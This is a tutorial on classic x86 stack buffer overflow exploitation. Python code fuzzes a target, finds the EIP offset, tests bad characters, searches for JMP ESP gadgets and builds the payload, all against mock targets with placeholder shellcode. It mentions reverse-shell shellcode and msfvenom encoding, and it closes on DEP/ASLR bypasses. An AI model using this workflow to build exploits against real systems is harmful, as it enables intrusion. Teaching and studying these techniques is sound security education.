Script kiddies use Metasploit. Hackers write exploit modules. This guide covers the classic Stack-Based Buffer Overflow in x86 Assembly.
The Payload Structure
1. Padding: 'A' x 500 (junk that fills the buffer and everything between it and the saved return address; the exact count is whatever the fuzzing step measures, 500 is just this guide's example).
2. EIP: the 4 bytes that land on the saved return address, written little-endian, holding the address of a `JMP ESP` instruction.
3. NOP Sled: '\x90' x 16 (a run of no-op instructions; land anywhere in it and execution slides down into the code).
4. Shellcode: the machine code you actually want to run (e.g., a reverse shell). It is not a virus, just a few hundred bytes of position-independent code that runs from the stack.
1. Fuzzing
Send 100 'A's. Normal.
Send 500 'A's. Crash!
Debugger says: `EIP = 41414141`.
0x41 is the ASCII code for 'A'. Four of your 'A's landed on the saved return address and were popped into EIP when the function returned: you control the flow. You still need to know which four. Resend the same length as a non-repeating cyclic pattern (`msf-pattern_create -l 500`) and look the crash value up with `msf-pattern_offset`; the result is the exact padding length for the payload.
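The fuzz-then-measure loop above, as an added example (not code from the original guide). The target is a constructed stand-in whose saved return address sits 412 bytes past the buffer; a real run sends the buffer over the network and reads EIP from the debugger. `pattern_create` and `pattern_offset` reimplement what msf-pattern_create and msf-pattern_offset do, including the little-endian repacking of the crash value.

```python
import itertools
import string
import struct

# Constructed stand-in for the vulnerable service (not a real target): the saved return
# address sits RET_OFFSET bytes past the start of the buffer.
RET_OFFSET = 412


def mock_target(payload: bytes):
    """Return None while the input fits; otherwise the 32-bit value that lands on the
    saved return address (what the debugger would show as EIP after the crash)."""
    if len(payload) < RET_OFFSET + 4:
        return None
    return struct.unpack("<I", payload[RET_OFFSET:RET_OFFSET + 4])[0]


def fuzz(target, start=100, step=100, limit=2000):
    """Send growing buffers of 'A' until the target crashes with EIP overwritten.
    Returns (length that crashed, EIP value), or None if nothing crashed up to limit."""
    for n in range(start, limit + 1, step):
        eip = target(b"A" * n)
        if eip is not None:
            return n, eip
    return None


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the msf-pattern_create style: Aa0Aa1...Aa9Ab0...
    Within its 20280-byte period every 4-byte window is unique, so the value
    found in EIP identifies exactly one offset."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    out = bytearray()
    for up, lo, dg in itertools.product(string.ascii_uppercase,
                                        string.ascii_lowercase, string.digits):
        out += (up + lo + dg).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip: int, pattern: bytes):
    """msf-pattern_offset equivalent: the crash value is a little-endian dword, so
    repack it to recover the four bytes as they sat in memory, then locate them."""
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    return idx if idx != -1 else None


def find_offset(target, length=500):
    """Resend the crashing length as a cyclic pattern and read the exact padding size."""
    pattern = pattern_create(length)
    eip = target(pattern)
    if eip is None:
        return None
    return pattern_offset(eip, pattern)


if __name__ == "__main__":
    crash_len, eip = fuzz(mock_target)
    print(f"crashed at {crash_len} bytes, EIP = {eip:08x}")
    print(f"offset to saved EIP: {find_offset(mock_target)}")
```

With the constructed target, 500 'A's crash with EIP = 41414141, and the pattern run reports offset 412: padding is 412 bytes, not 500, and the four bytes at 412..415 are the ones that become EIP.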
2. Bad Characters
Before you send your shellcode, check for "Bad Chars": byte values the target mangles or stops at.
\x00 (Null Byte) terminates a C string, so strcpy stops copying there.
\x0a (Line Feed) ends the line in text protocols such as HTTP; whatever follows is parsed as the next line and never reaches the buffer.
If your shellcode contains one of these, the bytes after it arrive truncated or altered, and the corrupted code crashes instead of running. Find the full set empirically: send every byte value \x01-\xff after the EIP overwrite, compare the stack in the debugger with what you sent, remove the first byte that differs, and repeat until the string survives intact. Then generate shellcode that avoids them, e.g. with msfvenom's `-b '\x00\x0a'` and an encoder such as `-e x86/shikata_ga_nai`.
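The send-and-compare loop just described, as an added example (not the guide's own code). The target is again a constructed stand-in, a line-based service that truncates at NUL, LF and CR; in practice `target` is your socket send plus a debugger memory dump of the stack, and the bad-char list goes to msfvenom's `-b` option.

```python
def badchar_test_string(exclude=(0x00,)) -> bytes:
    """Every byte value in order, minus those already known to be bad. Sent right
    after the EIP overwrite so it lands where the shellcode will later sit."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent: bytes, observed: bytes):
    """Compare the bytes read back from the stack (debugger dump) with what was sent.
    Returns the first byte that was dropped or altered, or None if the copy is intact.
    Only the first mismatch is trustworthy: once a byte is dropped, everything after
    it shifts, so the caller removes one byte per round and resends."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_chars(target, known=(0x00,)):
    """Iterate send/compare until the whole test string survives the copy unchanged."""
    bad = set(known)
    while True:
        sent = badchar_test_string(bad)
        culprit = first_bad_char(sent, target(sent))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)


def msfvenom_badchars(bad) -> str:
    """Format the list the way msfvenom's -b option expects, e.g. '\\x00\\x0a'."""
    return "".join(f"\\x{b:02x}" for b in bad)


# Constructed stand-in for the target (not a real service): it splits the request on
# line endings (stops at LF or CR) and then copies it with strcpy (stops at NUL).
def mock_target(data: bytes) -> bytes:
    for terminator in (b"\x00", b"\x0a", b"\x0d"):
        cut = data.find(terminator)
        if cut != -1:
            data = data[:cut]
    return data


if __name__ == "__main__":
    bad = find_bad_chars(mock_target)
    print("bad chars:", msfvenom_badchars(bad))
```

Against the constructed target the loop needs three rounds: the first dump stops at \x0a, the second at \x0d, the third comes back intact, giving `\x00\x0a\x0d`. Note that \x00 is excluded from the first round up front; sending it would cut the string at byte one and tell you nothing about the rest.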
3. JMP ESP
We need an address that is the same on every run (a module loaded without ASLR, typically an old DLL shipped with the application) that contains the two-byte instruction `JMP ESP` (opcode FF E4). Alignment does not matter on x86, so the bytes can sit inside a longer instruction; debugger plugins such as mona list candidates (`!mona jmp -r esp`).
We point EIP to that address, written little-endian. The address is part of the payload, so it must not contain any of the bad chars either.
The CPU returns into it, executes `JMP ESP`, and lands on the stack just past the overwritten return address, where our NOP sled and Shellcode are waiting.
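Searching a module for `JMP ESP` and assembling the final buffer from the Payload Structure list, as one added example (not the guide's code). The module image and its base address are constructed by hand to mimic a non-ASLR DLL; a real run reads the bytes from the DLL on disk or from the debugger. The "shellcode" is four INT3 breakpoints, a stand-in used to confirm in the debugger that execution reaches the sled before a real reverse shell is dropped in.

```python
import struct

# Opcode sequences that transfer control to the stack pointer. Any byte offset counts:
# x86 has no instruction alignment, so FF E4 inside a longer instruction still works.
GADGETS = {
    "jmp esp": b"\xff\xe4",
    "call esp": b"\xff\xd4",
    "push esp; ret": b"\x54\xc3",
}


def find_jmp_esp(image: bytes, base: int, bad_chars=(0x00,)):
    """Scan a module's raw bytes for the gadgets above and return (address, name) for
    every hit whose little-endian encoding is free of bad chars: the address goes into
    the payload, so it has to pass the same filter as the shellcode."""
    hits = []
    for name, opcodes in GADGETS.items():
        start = 0
        while True:
            i = image.find(opcodes, start)
            if i == -1:
                break
            addr = base + i
            if not any(b in bad_chars for b in struct.pack("<I", addr)):
                hits.append((addr, name))
            start = i + 1
    return sorted(hits)


def shellcode_bad_char(shellcode: bytes, bad_chars=(0x00,)):
    """Return the first bad byte present in the shellcode, or None if it is clean."""
    for b in bad_chars:
        if b in shellcode:
            return b
    return None


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_len: int = 16, bad_chars=(0x00,)) -> bytes:
    """padding | saved EIP -> jmp esp | NOP sled | shellcode.
    After `ret` pops the overwritten EIP, ESP points at the next dword, which is the
    start of the sled; that is why jmp esp lands exactly where we want it."""
    culprit = shellcode_bad_char(shellcode, bad_chars)
    if culprit is not None:
        raise ValueError(f"shellcode contains bad char {culprit:#04x}; re-encode it")
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode


# Constructed module image (not a real DLL): INT3 filler with three gadgets planted at
# known offsets. BASE mimics a non-ASLR DLL load address.
BASE = 0x62500000
_img = bytearray(b"\xcc" * 0x200)
_img[0x000:0x002] = b"\xff\xe4"  # jmp esp at 0x62500000 -> 00 00 50 62: contains NUL, rejected
_img[0x170:0x172] = b"\x54\xc3"  # push esp; ret at 0x62500170 -> 70 01 50 62: usable
_img[0x1b3:0x1b5] = b"\xff\xe4"  # jmp esp at 0x625001b3 -> b3 01 50 62: usable
MODULE = bytes(_img)

# \xcc is INT3: breakpoints stand in for real shellcode until control flow is confirmed.
PLACEHOLDER_SHELLCODE = b"\xcc" * 4


if __name__ == "__main__":
    bad = (0x00, 0x0a, 0x0d)
    candidates = find_jmp_esp(MODULE, BASE, bad)
    for addr, name in candidates:
        print(f"{addr:08x}  {name}")
    ret_addr = candidates[-1][0]  # the jmp esp at 0x625001b3
    payload = build_payload(412, ret_addr, PLACEHOLDER_SHELLCODE, bad_chars=bad)
    print(len(payload), "bytes; EIP bytes on the wire:", payload[412:416].hex())
```

The first gadget in the image is a perfectly good `JMP ESP`, but its address packs to `00 00 50 62`, so it is dropped: an address with a null byte would be cut by the same strcpy that cuts the shellcode. The offset 412 is whatever the pattern step measured for the target; substitute your own.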
Modern Protections
This classic attack is stopped by DEP (Data Execution Prevention: the stack is mapped non-executable, so `JMP ESP` lands on memory the CPU refuses to run) and ASLR (Address Space Layout Randomization: modules load at a different base on every run, so there is no fixed `JMP ESP` address). Stack canaries (MSVC /GS, GCC -fstack-protector) catch the overwrite itself: the saved return address is only reached by clobbering the canary, and the function aborts instead of returning.
ASLR Bypass: a memory leak (an info-disclosure bug, or a format string) reveals a module's base address; gadget offsets are fixed relative to it, so one leaked pointer de-randomizes the whole module.
DEP Bypass: ROP (Return Oriented Programming), chaining short existing code fragments that end in `ret` to, for example, call VirtualProtect on the stack and make it executable, then fall through into the shellcode.